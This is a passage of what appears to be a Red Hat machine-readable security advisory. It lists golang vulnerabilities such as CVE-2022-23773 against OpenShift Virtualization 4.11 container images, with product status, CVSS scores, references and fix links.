"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", 